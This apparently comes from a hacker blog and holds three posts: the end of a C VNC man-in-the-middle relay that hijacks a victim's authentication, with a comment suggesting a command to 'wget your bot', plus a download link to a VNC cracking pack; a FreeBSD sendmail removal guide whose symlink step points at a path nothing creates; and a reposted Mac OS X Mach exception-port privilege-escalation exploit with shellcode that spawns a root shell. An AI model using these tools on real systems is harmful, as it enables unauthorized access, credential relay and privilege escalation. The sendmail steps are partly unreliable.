buf [3] = 0x02;
/* we send the authentication method code to the client */
if (write (clientfd, buf, 4) < 4) {
perror ("write");
exit (-1);
}
/* Upstream side: an ordinary client connection to the real server. */
if ((vncfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&vnc, sizeof (vnc));
vnc.sin_family = AF_INET;
vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
vnc.sin_port = htons (VNCPORT);
/* we connect to the real VNC server */
if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc) ) == -1) {
perror ("connect");
exit (-1);
}
/* again, we read version number from the VNC server */
if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
perror ("read");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* and we send ours */
if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read auth method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* From here on the challenge and the response cross unmodified, 16 bytes
 * each: the server never learns that a third party sits in between. */
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted pass from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted pass to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the auth process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authd */
/* place whatever code you want here ex: ftp cmd to wget your bot... */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}

Nice one eh… hehe, now imagine making ppl log on and showing them a fake-looking VNC, but in fact it is MiTM :P I have kept this one hidden until, I guess, I got sick of being alone :P
Now..what else is handy for vnc ?

Try grab this, it might be more useful, but remember about the best exploit which has no CVE… yet I just posted it :) the no.1 8-digit bypass is the best!
this pack is only tools… not all mine, and not MY viewer, but I could add the viewer if I am requested personally, only on my irc channel #haxnet - EFnet!
xd!
-> http://hotfile.com/dl/136984708/855b1ef/VNC.Cracking-ALL.rar.html

ALSO look for VNCsnapshot, and also the author of it or a member of the team maybe, who actually made a MOD of it which works exactly with MY bots' listing :P so it is c00l :)
Anyhow, this is , enough for now...

[FreeBSD 8.2 And below INFOZ]: Removing/disabling sendmail properly !

Posted on 6th December 2011 in Papers

OK, so let's make this painless, ok… this is the fastest and easiest way to switch the rubbish OFF without a reboot!
Here we go…

killall sendmail ## to stop all sendmail processes

# Move the binaries aside rather than delete them, then strip all
# permissions from the copies so nothing can execute them meanwhile.
mv /usr/sbin/sendmail /usr/sbin/sendmail.old
mv /usr/lib/sendmail /usr/lib/sendmail.old #this may not apply if there is no sendmail binary in this location

chmod 0 /usr/lib/sendmail.old /usr/sbin/sendmail.old

##Now we will need to instruct FreeBSD not to attempt to start Sendmail upon
##startup. This is done by make the following modification to the /etc/rc.conf file:

CHANGE:
sendmail_enable="YES" #-> to -> sendmail_enable="NONE"
##OR do this command:
# NOTE(review): appending leaves the earlier sendmail_enable="YES" line in
# place; rc.conf is sourced as a shell script so the later assignment
# should win, but editing the existing line is the cleaner option.
# Newer releases document per-daemon switches (sendmail_submit_enable,
# sendmail_outbound_enable, sendmail_msp_queue_enable) instead of "NONE";
# check rc.sendmail(8) for the installed release.
echo 'sendmail_enable="NONE"' >> /etc/rc.conf

# Finally symlink so shits backed the fk up..
# NOTE(review): no step above creates /var/bin/sendmail, so these links
# dangle unless it already exists — the moved binaries are the *.old files.
# Confirm the intended target before relying on this step.
ln -s /var/bin/sendmail /usr/lib/sendmail
ln -s /var/bin/sendmail /usr/sbin/sendmail

## Thats it, fast, simple and dead easy!

xd // admin

[Thousand-day] MacOSx/Darwin8 reworked mach handling exploit

Posted on 3rd December 2011 in Exploits

An old reworked MacOS X/Darwin kernel sploit… handy when pentesting some things ;)
Mainly for users of Apple objects …

//reworked: macosex.c
/* excploit.c - 28 Nov 2005 - xmath@math.leidenuniv.nl
 * Exploitable Mach Exception Handling
 * Affected:  Mac OS X 10.4.6 (darwin 8.6.0) and older
 * When a process executes a setuid executable, all existing rights to the
 * task port are invalidated, to make sure unauthorized processes do not
 * retain control of the process.  Exception handlers however remain installed,
 * and when some kind of hardware exception occurs, the exception handler can
 * receive a new right to the task port as one of its arguments, and thus
 * regain full control over the process.
 * Interestingly, the code to reset the exception handlers (and hence thwart
 * this attack) upon exec() of a setuid executable has been present in the
 * kernel since OSX 10.3, but is disabled (#if 0) for unspecified reasons.
 * ADDED 10.3.x support now
 * This exploit installs an exception handler on illegal memory access, forks
 * off a child (the handler is inherited), and uses RLIMIT_STACK to cause a
 * segfault after exec().  The shell code invokes /bin/csh now
 * Greetings to Scrippie and #vuln
 */
/*
 * http://docs.info.apple.com/article.html?artnum=304460
 * Kernel
 * CVE-ID: CVE-2006-4392
 * Available for: Mac OS X v10.4 through Mac OS X v10.4.7, Mac OS X Server v10.4 through Mac OS X Server v10.4.7
 * Impact: Local users may be able to run arbitrary code with raised privileges
 * Description: An error handling mechanism in the kernel, known as Mach exception ports, provides the ability
 * to control programs when certain types of errors are encountered. Malicious local users could use this mechanism
 * to execute arbitrary code in privileged programs if an error is encountered. This update addresses the issue by
 * restricting access to Mach exception ports for privileged programs. Credit to Dino Dai Zovi of Matasano Security
 * for reporting this issue.
 * did you guys really forget to patch 10.3 ?
 * I know the original exploit didn't compile there but comon guys.
 * This is a patch for http://www.milw0rm.com/exploits/2463
 * http://cds.xs4all.nl:8081/tmp/excploit.c
 * Dropped in http://blogs.23.nu/ilja/ on Sept 21 2006
 * - KF
 */
#include <sys/time.h>   // One liner to make it compile on 10.3.X (mod #1)
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>
#include <mach/mach.h>

extern boolean_t exc_server(mach_msg_header_t *, mach_msg_header_t *);

/* Demonstration of the flaw described in the header comment: a Mach
 * exception port set on the parent survives the child's exec() of a
 * setuid binary, so the handler later receives a right to the privileged
 * task.
 * Parent: allocates a receive right, registers it as the handler for
 * EXC_BAD_ACCESS with the state+identity flavour and PPC_THREAD_STATE
 * (presumably PowerPC-only), serves one exception message and waits.
 * Child: inherits the exception port, sets RLIMIT_STACK from a
 * zero-initialised static (i.e. to 0) so the exec'd program faults at
 * once, and execs the setuid chsh.  The fault is delivered to
 * catch_exception_raise_state_identity() below.
 * Apple's fix (CVE-2006-4392, quoted above) restricts access to Mach
 * exception ports for privileged programs; patched systems do not hand
 * the task right to this handler.  None of the Mach calls here are
 * error-checked. */
int main(void) {
mach_port_t self = mach_task_self(), exc;
mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &exc);
mach_port_insert_right(self, exc, exc, MACH_MSG_TYPE_MAKE_SEND);
task_set_exception_ports(self, EXC_MASK_BAD_ACCESS, exc,EXCEPTION_STATE_IDENTITY, PPC_THREAD_STATE);
if (fork()) {
mach_msg_server_once(exc_server, 512, exc, 0);   /* handle exactly one exception message */
wait(NULL);
} else {
static struct rlimit rl;                         /* static => zero, i.e. a 0-byte stack limit */
setrlimit(RLIMIT_STACK, &rl);
execl("/usr/bin/chsh", "chsh", NULL);
}
return 0;
}

/* PowerPC machine code that the exception handler writes into the target
 * task; per the header comment it ends by invoking /bin/csh.  The trailing
 * words hold the path string. */
static long implant[] = {
0x48000015, 0x00000000, 0x00100000, 0x00000000,
0x00100000, 0x7ca802a6, 0x38600003, 0x38850000,
0x380000c3, 0x44000002, 0x60000000, 0x38600000,
0x38000017, 0x44000002, 0x60000000, 0x38600000,
0x380000b5, 0x44000002, 0x60000000, 0x38650068,
0x38850074, 0x90640000, 0x3800003b, 0x44000002,
0x60000000, 0x38000001, 0x44000002, 0x2f2f2f62,  // /bin/csh is more fun than /usr/bin/id (mod #2)
0x696e2f63, 0x73680000, 0x00000000, 0x00000000,
};

/* Handler callback reached through exc_server() when the child's exec'd
 * setuid process faults.  `task` is the right to the now-privileged task
 * that the header describes as the flaw; the handler allocates a region in
 * that task (its address is returned through os) and copies `implant`
 * into it.  NOTE(review): `os` is the out-state buffer of the
 * state+identity flavour, so the allocated address appears to be handed
 * back as the thread's new state — confirm against the Mach docs.  Nothing
 * is error-checked and KERN_SUCCESS is always returned.
 * Unused parameters: exc, t, e, ed, edsz, f, is, isz. */
kern_return_t catch_exception_raise_state_identity(mach_port_t exc, thread_t t,
task_t task, exception_type_t e, exception_data_t ed,
mach_msg_type_number_t edsz, int *f, thread_state_t *is,
mach_msg_type_number_t isz, thread_state_t *os) {
vm_allocate(task, os, sizeof implant, TRUE);
vm_write(task, *os, implant, sizeof implant);
return KERN_SUCCESS;
}

Enjoy the reworked version which drops you into csh :-)
xd // Admin // #Haxnet admim